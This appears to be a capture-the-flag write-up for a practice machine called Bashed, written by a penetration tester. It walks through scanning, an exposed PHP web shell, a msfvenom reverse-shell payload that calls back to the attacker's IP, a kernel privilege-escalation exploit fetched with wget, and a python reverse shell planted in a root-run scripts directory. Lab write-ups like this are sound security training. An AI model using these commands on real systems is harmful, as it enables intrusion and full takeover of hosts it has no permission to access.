Machine ip — 10.10.10.68

Nmap

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel’s Development Site
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=9/23%OT=80%CT=1%CU=30911%PV=Y%DS=2%DC=T%G=Y%TM=5D8824C
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Uptime guess: 0.857 days (since Sun Sep 22 10:45:27 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros

Here we get to see that only port 80 seems to be open now let’s enumerate on http

Visited http page doesn’t seems to me giving more information to us

Let’s start with directory ( used dirsearch )

Here we found

dirsearch -u http://10.10.10.68 -e/

After moving further we found that /dev/ directory is having 2 php files and on running them they gives us shell of user “WWW-DATA”

using http://10.10.10.68/dev/phpbash.php

here we find that it’s giving us a web terminal where we can use it for gathering information

Here when we give commands at bottom of the page it gives us output at the main screen , let’s try using nc to get a reverse shell on our local pc

As we can see that we are unable to get a shell as it’s giving us errors for the “e” option , but there are many alternate ways to get a reverse shell let’s try them ….

Here first let’s start a reverse nc listener at out local pc

nc -nvlp 1234

And let’s try alternate way to take a reverse shell , creating the reverse shell payload with msfvenom

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.19 LPORT=1234 -f elf > shell.elf

Then wget it to our target pc , then give it permission to execute chmod 777 shell.elf then run it ./shell.elf

And here we get our reverse shell

Here we used LinEnum.sh to find some vulnerability for privilege escalation , using this we found that machine is having a kernel exploit and then we used 41458.c and then we got see that the target machine is not having GCC compiler on it so that we can compile it so we compile the exploit on our local pc then transferred the compiled exploit to machine and then run it

Usage :-

1. gcc poc.c -o pwnthen wget the pwn file form attacker pc to target pc 
python -m SimpleHTTPServer 80 - attacker pc
wget http://10.10.14.19:80/pwn - target pc
then use ./pwn

And here we get the root shell

Got root.txt

…………………………….2nd way to exploit………………………………..

SECOND WAY — using sudo command

Here we can see that www-data user can use sudo command using the user scriptmanager , and when we see the / directory there is a new directory scripts as we are having sudo command to use scriptmanager user as per our utilization let’s see what does scripts directory contains

sudo -u scriptmanager ls -la /scripts 

And now when we run pspy32 to see what is this directory doing in background

Here we can see that whatever file scripts directory contains in it having .py extension so now let’s create a python reverse shell file and then place it at scripts directory and then let’s wait for the root to run ,

We can place our python file , you can script at reverse.py and change your ip and port in the script

Then get this to our victim pc using wget then move our python script to scripts directory so that it can run and we can get a reverse shell of root

Now let’s move this file to our scripts directory using

sudo -u scriptmanager cp /tmp/reverse.py /scripts/reverse.py

And start our nc at giver port in the script

Here we got the root

THANKYOU !!!!!!!!!

Security Researcher, Penetration Tester